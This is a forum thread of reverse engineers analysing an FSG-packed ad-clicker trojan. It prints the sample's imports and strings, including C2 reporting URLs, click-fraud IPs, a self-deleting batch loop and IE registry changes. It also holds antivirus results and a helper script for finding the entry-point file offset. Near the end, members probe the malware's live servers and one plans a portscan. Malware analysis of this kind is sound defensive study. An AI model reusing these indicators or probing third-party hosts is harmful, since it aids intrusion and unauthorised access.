Spyware or what ?


seven
January 14th, 2007, 20:19
Hi all, I found this proggy in the TEMP folder

deleted it more than 1000 timez, it returned again

iz it spyware or a trojan or a virus or what?

blurcode
January 14th, 2007, 20:23
All three together?

esther
January 14th, 2007, 21:59
Please delete the attachment. Yes, it is 3 in 1.

You might need to boot in safe mode and get rid of it.

Kayaker
January 15th, 2007, 01:05
Yep, McAfee calls this Generic AdClicker.b Trojan. So, should we delete the attachment, or is this a reversing forum? What about using this as a real-life miniproject target?

Sure, cracking shareware is instructional and builds up a reverser's skills. Doing crackmes is a pleasant pastime. Neither of these has much "danger" factor to it.

What if you want to get into the AV/anti-malware field, where companies are actually begging for qualified people who have the expertise to handle the "hot" targets such as this one? You got the skillz to deal with such a beast as this one? Got a VM set up? How's your outgoing firewall? Can you analyze it without inadvertently destroying your system?

Maybe as a group project those with more experience can guide those with less who might be a bit hesitant to work with such a file.

Wanna try?

blabberer
January 15th, 2007, 04:14
malware is fun to play with

this looks like it uses GDI to write text to wherever it is going to write

ok, when dealing with malware one doesn't start out debugging it; one at least has a cursory glance statically before proceeding to load it in a debugger, else some clever little tricks may simply trick you into falling for the baits

those who prefer to use their favourite hex editor or LordPE or whatever are free to use them

i'll use OllyDbg only

let's go

unzip the attachment (use a virtual machine to follow; don't use your production machine to follow unless you are absolutely sure you can deal with the consequences successfully)

start OllyDbg
View -> File -> load the 12345678.exe

go to offset 0
right click -> Special -> PE header

what do you notice? (if you are already familiar with PE header formats it doesn't look like a normal PE header, so you can be sure that this is not a normal binary; it could be packed, crypted, obfuscated, whatever)

so no point loading it directly in a debugger, let's poke around a little bit more
let's find the entry point and see if we can decipher some more things before taking the plunge

ok, we see the section headers: we see its virtual address is 24000, its pointer to raw data is 200 and the address of entry point is 27462

so it's located physically at
27462 - 24000 + 200; let's do ctrl+g

and type in 3662

we pore over the disassembly and all we see are a few calls and short jumps within viewable distances; only one jump in there sticks out like a sore thumb
can you identify it and tell why it could be useful enough?
from the jump can you really identify the OEP?? just with basic information and the opcodes??

and can you follow your gut instinct and prove your hypothesis is right?

you haven't yet loaded it in a debugger or a real disassembler that would make your life a little easier, but you can still be about 99.9% sure about the OEP you would decipher at this stage

i'll post my hypothesis later
anyone else???

some of the imports it resolves and some strings generated after unpacking are like this; what do you find if you hunt down information on the URLs?

Code:

77D40000 Module C:\WINDOWS\system32\user32.dll
0042750B COND: ReleaseDC
0042750B COND: GlobalFree
0042750B COND: GlobalLock
0042750B COND: GlobalUnlock
0042750B COND: LocalAlloc
0042750B COND: LocalFree
0042750B COND: MultiByteToWideChar
0042750B COND: ReadFile
0042750B COND: SetEndOfFile
0042750B COND: SetFilePointer
0042750B COND: Sleep
0042750B COND: WideCharToMultiByte
0042750B COND: WinExec
0042750B COND: WriteFile
0042750B COND: lstrcatA
0042750B COND: lstrcmpA
0042750B COND: lstrcmpiA
0042750B COND: lstrcpyA
0042750B COND: lstrcpynA
0042750B COND: lstrlenA
0042750B COND: GlobalAlloc
0042750B COND: GetVersionExA
0042750B COND: GetTickCount
0042750B COND: GetTempPathA
0042750B COND: GetSystemDirectoryA
0042750B COND: GetModuleFileNameA
0042750B COND: GetCurrentProcess
0042750B COND: CloseHandle
0042750B COND: HeapFree
0042750B COND: HeapAlloc
0042750B COND: GetProcessHeap
0042750B COND: GetFileSize
0042750B COND: CopyFileA
0042750B COND: CreateFileA
0042750B COND: DeleteFileA
0042750B COND: ExitProcess
77F10000 Module C:\WINDOWS\system32\GDI32.dll
77DD0000 Module C:\WINDOWS\system32\advapi32.dll
0042750B COND: OpenProcessToken
0042750B COND: LookupPrivilegeValueA
0042750B COND: RegCloseKey
0042750B COND: RegOpenKeyExA
0042750B COND: RegSetValueExA
0042750B COND: AdjustTokenPrivileges
77E70000 Module C:\WINDOWS\system32\RPCRT4.dll
771B0000 Module C:\WINDOWS\system32\wininet.dll
77C10000 Module C:\WINDOWS\system32\msvcrt.dll
77F60000 Module C:\WINDOWS\system32\SHLWAPI.dll
77A80000 Module C:\WINDOWS\system32\CRYPT32.dll
77B20000 Module C:\WINDOWS\system32\MSASN1.dll
77120000 Module C:\WINDOWS\system32\OLEAUT32.dll
774E0000 Module C:\WINDOWS\system32\ole32.dll
773D0000 Module C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
0042750B COND: InternetCloseHandle
0042750B COND: HttpSendRequestA
0042750B COND: HttpOpenRequestA
0042750B COND: FindNextUrlCacheEntryA
0042750B COND: FindFirstUrlCacheEntryA
0042750B COND: DeleteUrlCacheEntryA
0042750B COND: InternetConnectA
77260000 Module C:\WINDOWS\system32\urlmon.dll
0042750B COND: URLDownloadToFileA
77C00000 Module C:\WINDOWS\system32\VERSION.dll
7C9C0000 Module C:\WINDOWS\system32\shell32.dll
0042750B COND: ShellExecuteA
0042750B COND: GetTextExtentPoint32A
0042750B COND: GetObjectA
0042750B COND: DeleteObject
0042750B COND: PatBlt
0042750B COND: CreateFontA
0042750B COND: CreateCompatibleDC
0042750B COND: CreateCompatibleBitmap
0042750B COND: SelectObject
0042750B COND: StretchBlt
0042750B COND: TextOutA
0042750B COND: CreateDIBitmap
0042750B COND: CreateDIBSection
0042750B COND: DeleteDC
0042750B COND: OleInitialize
0042750B COND: OleUninitialize
0042750B COND: CoCreateInstance
0042750B COND: VariantInit
0042750B COND: SysFreeString
0042750B COND: SysAllocString

Text strings referenced in 47547792:
Address Disassembly Text string
00401000 PUSH EBP (Initial CPU selection)
0040121F PUSH 47547792.00408C3D ASCII "complete"
0040125F PUSH 47547792.00408C48 ASCII "interactive"
0040127C PUSH 47547792.00408C54 ASCII "HL_"
00401281 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040128D PUSH 47547792.00408C58 ASCII "HD_"
00401292 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012A9 PUSH 47547792.00408C5C ASCII "DO_"
004012AE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012BA PUSH 47547792.00408C60 ASCII "IW_"
004012BF PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004013FC PUSH 47547792.00408C64 ASCII "7search.com/scripts/security/validate.asp"
00401479 PUSH 47547792.00408C94 ASCII "http://66.199.179.8/search.php"
0040148D PUSH 47547792.00408CB4 ASCII "http://65.39.170.123/search.php"
004014B8 PUSH 47547792.00408CD4 ASCII "http://66.250.74.152/click_second"
00401781 PUSH 47547792.00408CFC ASCII "NC2_"
00401786 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017A6 PUSH 47547792.00408D04 ASCII "NW_"
004017AB PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017CE PUSH 47547792.0040853E ASCII "winlogon.exe"
004017F0 PUSH 47547792.0040853E ASCII "winlogon.exe"
0040184C PUSH 47547792.0040854B ASCII "%d.%d-"
00401863 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401878 PUSH 47547792.004084EB ASCII "no"
0040187D PUSH 47547792.004084E2 ASCII "PopupMgr"
00401882 PUSH 47547792.00408487 ASCII "Software\Microsoft\Internet Explorer\New Windows"
00401891 PUSH 47547792.004084EB ASCII "no"
00401896 PUSH 47547792.004084F2 ASCII "Display Inline Images"
0040189B PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018AA PUSH 47547792.004084EB ASCII "no"
004018AF PUSH 47547792.00408508 ASCII "Display Inline Videos"
004018B4 PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018DE PUSH 47547792.00408AF1 ASCII "Regsvr32.exe /s shdocvw.dll"
004019B1 PUSH 47547792.00408D08 ASCII "&er["
004019B6 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019C5 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019CF PUSH 47547792.00408D10 ASCII "]="
004019D4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A19 PUSH 47547792.00408D14 ASCII "SW_"
00401A1E PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A4C PUSH 47547792.00408D18 ASCII "RB_"
00401A51 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A6A PUSH 47547792.00408552 ASCII "ghdfggf6j.tmp"
00401A82 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401D9C PUSH 47547792.00408D1C ASCII "DC_"
00401DA1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E06 PUSH 47547792.00408D20 ASCII "NL_"
00401E0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E28 PUSH 47547792.00408D24 ASCII "EC_"
00401E2D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E40 PUSH 47547792.00408D28 ASCII "NC_"
00401E45 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E65 PUSH 47547792.00408D2C ASCII "OW_"
00401E6A PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401EC7 PUSH 47547792.00408D30 ASCII "testovaya hren"
0040200B PUSH 47547792.004085B8 ASCII "Suurch
findnseek
shopzil
www.suurch.com
"
00402078 PUSH 47547792.00408566 ASCII "add to card
checkout
continue shopping
download
submit
click here
cart
"
00402223 PUSH 47547792.00408D40 ASCII "Im_"
00402228 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402284 PUSH 47547792.00408D44 ASCII "Lim_"
00402289 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022BC PUSH 47547792.00408D4C ASCII "Tc_"
004022C1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022D0 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023C9 PUSH 47547792.00408D50 ASCII "Mc_"
004023CE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023F5 PUSH 47547792.00408D54 ASCII "Lp_"
004023FA PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402634 PUSH 47547792.00408D5C ASCII "value=no_spyware"
004026EA PUSH 47547792.00408D70 ASCII "f1"
0040271B PUSH 47547792.00408D74 ASCII "f3"
00402752 PUSH 47547792.00408D78 ASCII "None"
00402765 PUSH 47547792.00408D80 ASCII "none"
0040283E PUSH 47547792.00408D88 ASCII "FC_"
00402843 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004029F7 PUSH 47547792.00408D8C ASCII "Im_"
004029FC PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402A44 PUSH 47547792.00408D90 ASCII "66.250.74.152/kw_img/img_gen.php"
00402BB4 PUSH 47547792.00408DB4 ASCII "Im_"
00402BB9 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C6D PUSH 47547792.00408DBC ASCII "Tc_"
00402C72 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C81 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402D78 PUSH 47547792.00408DC0 ASCII "Mc_"
00402D7D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402F06 PUSH 47547792.00408DC4 ASCII "fc"
00402F0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040304D PUSH 47547792.00408DC8 ASCII "ac"
00403052 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403176 PUSH 47547792.00408DCC ASCII "rc"
0040317B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403414 PUSH 47547792.00408DD0 ASCII "BODY_"
00403419 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403568 PUSH 47547792.00408443 ASCII "grdsfsd.bat"
00403598 PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035AB PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035C8 ASCII ""%s"",0
004035D2 PUSH 47547792.004035C8 ASCII ""%s""
004035F3 PUSH 47547792.00408482 ASCII "open"
00403759 PUSH 47547792.004085E7 ASCII "\drivers\etc\hosts"
004038DF PUSH 47547792.00408DD8 ASCII "text="
004038F7 PUSH 47547792.00408DE0 ASCII "&url="
00403911 ASCII "Content-Type: ap"
00403921 ASCII "plication/x-www-"
00403931 ASCII "form-urlencoded",0
0040394A PUSH 47547792.00408DE8 ASCII "MyAgent"
0040396B PUSH 47547792.00408428 ASCII "greeng.biz"
00403989 PUSH 47547792.00408437 ASCII "ht/post.php"
0040398E PUSH 47547792.00408DF0 ASCII "POST"
004039B0 PUSH 47547792.00403911 ASCII "Content-Type: application/x-www-form-urlencoded"
00403A4D PUSH 47547792.00408DF8 ASCII "Shell DocObject View"
00403A61 PUSH 47547792.00408E0D ASCII "Internet Explorer_Server"
00403CA5 MOV EDI, 47547792.0040863A ASCII "Arial"
00403D89 PUSH 47547792.00408E26 ASCII "%ld_%ld_%ld"
00403DA4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004042E2 PUSH 47547792.00408E34 ASCII "%lX.png"
00404473 PUSH 47547792.00408E3C ASCII "RZ_"
00404478 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004044CE PUSH 47547792.00408E40 ASCII "Arial"
004045BD PUSH 47547792.00408E48 ASCII "%lX.png"
004048EC PUSH 47547792.00408560 ASCII "-%lX-"
00404907 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00404931 PUSH 47547792.00408ADD ASCII "SeShutdownPrivilege"

00408000 ASCII "http://greeng.bi"
00408010 ASCII "z:2080/rd/rep.ph"
00408020 ASCII "p?er[0]=",0
00408428 ASCII "greeng.biz",0
00408437 ASCII "ht/post.php",0
00408443 ASCII "grdsfsd.bat",0
0040844F ASCII ":gl234sh
del %1"
0040845F ASCII "
if exist %1 go"
0040846F ASCII "to gl234sh
del "
0040847F ASCII "%0",0
00408482 ASCII "open",0
00408487 ASCII "Software\Microso"
00408497 ASCII "ft\Internet Expl"
004084A7 ASCII "orer\New Windows"
004084B7 ASCII 0
004084B8 ASCII "Software\Microso"
004084C8 ASCII "ft\Internet Expl"
004084D8 ASCII "orer\Main",0
004084E2 ASCII "PopupMgr",0
004084EB ASCII "no",0
004084EE ASCII "yes",0
004084F2 ASCII "Display Inline I"
00408502 ASCII "mages",0
00408508 ASCII "Display Inline V"
00408518 ASCII "ideos",0
0040853E ASCII "winlogon.exe",0
0040854B ASCII "%d.%d-",0
00408552 ASCII "ghdfggf6j.tmp",0
00408560 ASCII "-%lX-",0
00408566 ASCII "add to card
che"
00408576 ASCII "ckout
continue "
00408586 ASCII "shopping
downlo"
00408596 ASCII "ad
submit
clic"
004085A6 ASCII "k here
cart
",0
004085B8 ASCII "Suurch
findnsee"
004085C8 ASCII "k
shopzil
www."
004085D8 ASCII "suurch.com
",0
004085E7 ASCII "\drivers\etc\hos"
004085F7 ASCII "ts",0
004085FA ASCII "ABCDEFGHIJKLMNOP"
0040860A ASCII "QRSTUVWXYZabcdef"
0040861A ASCII "ghijklmnopqrstuv"
0040862A ASCII "wxyz0123456789+_"
0040863A ASCII "Arial",0
00408640 ASCII "Century Gothic",0
0040864F ASCII "Haettenschweiler"
0040865F ASCII 0
00408660 ASCII "Times New Roman",0
00408670 ASCII "MS Sans Serif",0
0040867E ASCII "AvantGarde Bk BT"
0040868E ASCII 0
0040868F ASCII "Comic Sans MS",0
0040869D ASCII "Courier New",0
00408ADD ASCII "SeShutdownPrivil"
00408AED ASCII "ege",0
00408AF1 ASCII "Regsvr32.exe /s "
00408B01 ASCII "shdocvw.dll",0
00408C3D ASCII "complete",0
00408C48 ASCII "interactive",0
00408C54 ASCII "HL_",0
00408C58 ASCII "HD_",0
00408C5C ASCII "DO_",0
00408C60 ASCII "IW_",0
00408C83 ASCII "lidate.asp",0
00408C94 ASCII "http://66.199.17"
00408CA4 ASCII "9.8/search.php",0
00408CB4 ASCII "http://65.39.170"
00408CC4 ASCII ".123/search.php",0
00408CD4 ASCII "http://66.250.74"
00408CE4 ASCII ".152/click_secon"
00408CF4 ASCII "d",0
00408CFC ASCII "NC2_",0
00408D04 ASCII "NW_",0
00408D08 ASCII "&er[",0
00408D10 ASCII "]=",0
00408D14 ASCII "SW_",0
00408D18 ASCII "RB_",0
00408D1C ASCII "DC_",0
00408D20 ASCII "NL_",0
00408D24 ASCII "EC_",0
00408D28 ASCII "NC_",0
00408D2C ASCII "OW_",0
00408D30 ASCII "testovaya hren",0
00408D40 ASCII "Im_",0
00408D44 ASCII "Lim_",0
00408D4C ASCII "Tc_",0
00408D50 ASCII "Mc_",0
00408D54 ASCII "Lp_",0
00408D5C ASCII "value=no_spyware"
00408D6C ASCII 0
00408D70 ASCII "f1",0
00408D74 ASCII "f3",0
00408D78 ASCII "None",0
00408D80 ASCII "none",0
00408D88 ASCII "FC_",0
00408D8C ASCII "Im_",0
00408D90 ASCII "66.250.74.152/kw"
00408DA0 ASCII "_img/img_gen.php"
00408DB0 ASCII 0
00408DB4 ASCII "Im_",0
00408DBC ASCII "Tc_",0
00408DC0 ASCII "Mc_",0
00408DC4 ASCII "fc",0
00408DC8 ASCII "ac",0
00408DCC ASCII "rc",0
00408DD0 ASCII "BODY_",0
00408DD8 ASCII "text=",0
00408DE0 ASCII "&url=",0
00408DE8 ASCII "MyAgent",0
00408DF0 ASCII "POST",0
00408DF8 ASCII "Shell DocObject "
00408E08 ASCII "View",0
00408E0D ASCII "Internet Explore"
00408E1D ASCII "r_Server",0
00408E26 ASCII "%ld_%ld_%ld",0
00408E34 ASCII "%lX.png",0
00408E3C ASCII "RZ_",0
00408E40 ASCII "Arial",0
00408E48 ASCII "%lX.png",0
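
The file-offset arithmetic blabberer does by hand above (entry point RVA minus the section's VirtualAddress plus PointerToRawData), as an added example that is not code from the thread. It parses the section table itself and runs over a constructed stand-in header that carries only the thread's three values (0x24000, 0x200, 0x27462); the section's VirtualSize, SizeOfRawData and every other header field are made-up filler. It also reports the case a hand calculation silently gets wrong: an RVA that lies past the section's raw data, where nothing on disk backs it.

```python
"""Map a PE entry-point RVA to its file offset from the section table:
    offset = RVA - VirtualAddress + PointerToRawData
taken from the section whose virtual range contains the RVA."""
import struct

SECTION_HEADER_SIZE = 40


def parse_pe(data):
    """Return (AddressOfEntryPoint, [section dicts]) from raw PE bytes."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                      # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        hdr = opt + opt_size + i * SECTION_HEADER_SIZE
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, hdr)
        sections.append({"name": name.rstrip(b"\0"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rawsize,
                         "raw_ptr": rawptr})
    return entry_rva, sections


def rva_to_file_offset(sections, rva, file_size):
    """File offset backing `rva`, or None when nothing on disk backs it."""
    for s in sections:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            delta = rva - s["virtual_address"]
            # Past SizeOfRawData the section is zero-filled at load time;
            # an entry point there is a packer tell, and there is no file
            # byte to jump to, so report it instead of a bogus offset.
            if delta >= s["raw_size"]:
                return None
            offset = s["raw_ptr"] + delta
            return offset if offset < file_size else None
    return None


def entry_point_offset(data):
    entry_rva, sections = parse_pe(data)
    return rva_to_file_offset(sections, entry_rva, len(data))


def build_sample_pe():
    """Constructed stand-in for the thread's 12345678.exe. Only the three
    values blabberer reads off the headers are real (VirtualAddress 0x24000,
    PointerToRawData 0x200, AddressOfEntryPoint 0x27462); the rest is filler
    chosen so the image parses and is 16224 bytes like the VirusTotal report."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    opt_size = 0xE0                                      # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x10F)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, 0x27462)             # AddressOfEntryPoint
    section = struct.pack("<8sIIII", b"", 0x5000, 0x24000, 0x3D60, 0x200)
    section += b"\0" * (SECTION_HEADER_SIZE - len(section))
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section
    return image.ljust(0x3F60, b"\0")


if __name__ == "__main__":
    sample = build_sample_pe()
    print("entry point file offset: %#x" % entry_point_offset(sample))
```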


esther
January 15th, 2007, 04:59
Hi all,

It's packed with FSG v1.33 (ol' PEiD says)

well, after fixing the imports it still has problems running

well, this "crackme" does run in 2k SP4 but does nothing.

That's all for now

blabberer
January 15th, 2007, 05:46
well it uses queer OleInitialize and CoCreateInstance and calls somewhere in the rpcrt dlls, and in there it sits waiting for multiple messages whose masks are

QS_KEY, QS_MOUSEMOVE, QS_HOTKEY and a few other QS_

so it looks like it's doing nothing; this file may be a part of multiple droppers

and is probably looking for some events to happen before it can spew its venom

and it seems many of the antivirs out there aren't able to definitely classify it

plain Kaspersky file scanner gave this file a clean chit

Quote:

You're clean!
Scanned file: 475477922.exe



Statistics:
Known viruses: 258503 Updated: 15-01-2007
File size (Kb): 16 Virus bodies: 0
Files: 1 Warnings: 0
Archives: 0 Suspicious: 0



so i went to virus total and it seems none of the results are definitive

Code:


Antivirus Version Update Result
AntiVir 7.3.0.21 01.09.2007 no virus found
Authentium 4.93.8 01.12.2007 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
Avast 4.7.936.0 01.13.2007 Win32:Agent-BSU
AVG 386 01.15.2007 no virus found
BitDefender 7.2 01.15.2007 Trojan.Downloader.Popmup.A
CAT-QuickHeal 9.00 01.12.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 01.15.2007 Trojan.Clicker-21
DrWeb 4.33 01.15.2007 DLOADER.Trojan
eSafe 7.0.14.0 01.15.2007 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.113 01.13.2007 no virus found
eTrust-Vet 30.3.3329 01.15.2007 no virus found
Ewido 4.0 01.14.2007 no virus found
Fortinet 2.82.0.0 01.13.2007 suspicious
F-Prot 3.16f 01.12.2007 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
F-Prot4 4.2.1.29 01.12.2007 W32/Dlr-Trojan-Malware-based!Maximus
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.15.2007 no virus found
McAfee 4938 01.12.2007 Generic AdClicker.b
Microsoft 1.1904 01.15.2007 no virus found
NOD32v2 1980 01.15.2007 a variant of Win32/TrojanDownloader.Small.CYF
Norman 5.80.02 01.15.2007 no virus found
Panda 9.0.0.4 01.14.2007 Suspicious file
Prevx1 V2 01.15.2007 no virus found
Sophos 4.13.0 01.13.2007 Mal/Packer
Sunbelt 2.2.907.0 01.12.2007 VIPRE.Suspicious
TheHacker 6.0.3.148 01.14.2007 no virus found
UNA 1.83 01.12.2007 no virus found
VBA32 3.11.2 01.15.2007 no virus found
VirusBuster 4.3.19:9 01.15.2007 novirus:Packed/FSG


Aditional Information
File size: 16224 bytes
MD5: 649ef54499d2c97a7ff975a1e51288e0
SHA1: 0a66df3e99e4985a26744cb348c2b5da38f12af9
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.


so it might really be a good target to practice with collectively

anyone up to the task with good COM interface call expertise could jump in and create fun analysing it (especially explaining what interface it's calling and what the clsctx is (class context looks like it's using CLASSCTX_IN_PROC_SERVER CLSCTX_LOCAL_SERVER))

that's all for now, got work to do

ps (btw esther did you check browsing a few forums after it apparently did not run on your computer?? are you able to see images still??) i believe it would have successfully set
hkcu/software/m$/ie/main/--> display inline images to no

seven
January 15th, 2007, 08:43
Quote:
All three together

Quote:
you might need to boot in safe mode and get rid of it

i did that but no hope, besides i start to love this trojan
Quote:
kaspersky file scanner gave this file a clean chit

antivirus can't discover (trojan + virus) when packed coz packing
hides everything. i know coz i dealt with both 4 a long time.
Quote:
What about using this as a real-life miniproject target?

Kayaker: don't turn my trojan into one of ur projectz coz itz illegal

naides
January 15th, 2007, 09:42
Seven: If all you want is to get rid of the trojan, which I suspect was your only request,
search around for tools like "kill it" over the net. They are able to remove very clingy parasites, or read the manual removal instructions on one of the serious anti-virus sites.

ZaiRoN
January 15th, 2007, 11:35
Nice project definitely!

I had a glance at it and it seems easy to understand what it does, so it's a perfect program for curious newbies :-)
I would start with your questions and after that we can proceed with the analysis of the file, answering and clearing all the doubts which may arise working on malware in general. What do you all think?

Silkut
January 15th, 2007, 14:55
From a curious newbie's point of view I find it very exciting and interesting; I hopefully have several VMs (a particular one that is 'totally' separated from the host: ideal for malware?). I read every post with attention.
_learn the good reflexes
_increase RCE analysis performance
_particularities of malware analysis
_use alcohol as stimulant
..

esther
January 16th, 2007, 00:59
hi blabberer,

*ps ( btw esther did you check browsing a few forums after it apparantly did not run in your computer ?? are you able to see images still ?? ) i believe it would have successfully set
hkcu/software/m$/ie/main/--> display inline images to no

oh well, I'm on Windows 2000 SP4, no VMware.

While running, that "47..." stays in the process list.
It does all sorts of reading and querying; you can see it in Filemon.
then

'47.....EXE' from your computer wants to connect to 194.230.36.72.reverse.layeredtech.com [72.36.230.194], port 2080

The "47...." auto-deletes after that, hmmm
well I stopped there coz it's not a test machine

I checked my IE loading the forum and yes, the pictures and icons were disabled.

Well, you can reset it back in the advanced options in IE.

Have fun

blabberer
January 16th, 2007, 13:42
@esther
yeah you can reset it
my question was just to confirm your statement that it does not run

i was just baiting for questions to be asked and to bait some curious bystander to actually download, disassemble and put forward a few more queries
but questions haven't yet started pouring in

edit

just noticed that the post number is the devil's favourite number

am i being the devil's advocate

SiGiNT
January 16th, 2007, 17:44
Well, it seems it may be a wannabe browser hijacker; out of curiosity and total disregard for my computer here, I plugged "72.36.230.194 port 2080" into IE7 as a proxy, and when restarted it took me directly to a page called funfun.name - source listed below:


<html>
<head>
<title>
funfun.name
</title>

<style>
* { font-family: verdana; font-size: 10pt; COLOR: gray; }
b { font-weight: bold; }
table { height: 50%; border: 1px solid gray;}
td { text-align: center; padding: 25;}

</style>
</head>
<body>
<center>
<br><br><br><br>
<table>
<tr><td>Welcome to the home of <b>funfun.name</b></td></tr>
<tr><td>To change this page, upload your website into the public_html directory</td></tr>
<tr><td><img src="logo.jpg"></td></tr>
<table>

</center>
</body>

</html>

SiGiNT

esther
January 16th, 2007, 23:21
hi blabberer,

I have a language barrier here

*my question was just to confirm your statement that it does not run

It executes and it runs

update:
It seems it's a modified FSG. I'm a newbie in this, so would anyone want to confirm that?

LLXX
January 17th, 2007, 00:25
Did a WHOIS on that IP.
Quote:
Name: Suo-Anttila, Jeremy Paul
Handle: JPS66-ARIN
Company: Layered Technologies
Address: 18816 Preston Road
Address: Suite #100
City: Dallas
StateProv: TX
PostalCode: 75252
Country: US
Hmm... webhost?

Also noticed something interesting:
Quote:
http://66.250.74.152/kw_img/img_gen.php
Hit it with the browser...
Quote:
GET /kw_img/img_gen.php HTTP/1.0
Accept: */*
Accept-Language: en-us,zh;q=0.8,zh-cn;q=0.5,zh;q=0.3
Pragma: no-cache
User-Agent: Mozilla/4.00 (compatible; NetView/1.02; PN-DOS v8.94; MGnX v5.11)
Host: 66.250.74.152
Connection: keep-alive
Accept-encoding: gzip, deflate
======================
HTTP/1.1 200 OK
Date: Wed, 17 Jan 2007 05:13:45 GMT
Server: Apache/*.*.** (Unix) PHP/4.3.8
X-Powered-By: PHP/4.3.8
X-Accelerated-By: PHPA/1.3.3r2
Connection: close
Transfer-Encoding: chunked
Content-Type: image/png
And returns a PNG with some blurry text on it that seems to say "Error: No sid provid"

Using Fravia's art of Guessing, I try

http://66.250.74.152/kw_img/img_gen.php?sid=0123456879

...and get "Error: No pid provid". I'm onto something.

http://66.250.74.152/kw_img/img_gen.php?sid=0123456879&pid=0123456789

Ok, "Error: No string provid".

http://66.250.74.152/kw_img/img_gen.php?sid=0123456879&pid=0123456789&string=0123546789

No luck. Tried s, str, text, also with no luck. Googling the filename and the parameter names also produces no results. Backing up a directory we see img_gen.php and arial.ttf. This is some sort of image generator. Going up to the root produces the single line "hello".

I'm probably getting into security/hacking now, but I'll portscan this target later to see what we can gather.

This is fun.

blabberer
January 17th, 2007, 02:37
@esther i believe you really don't have any language barriers
but are too fond of your signature
that's some kind of conviction you hold
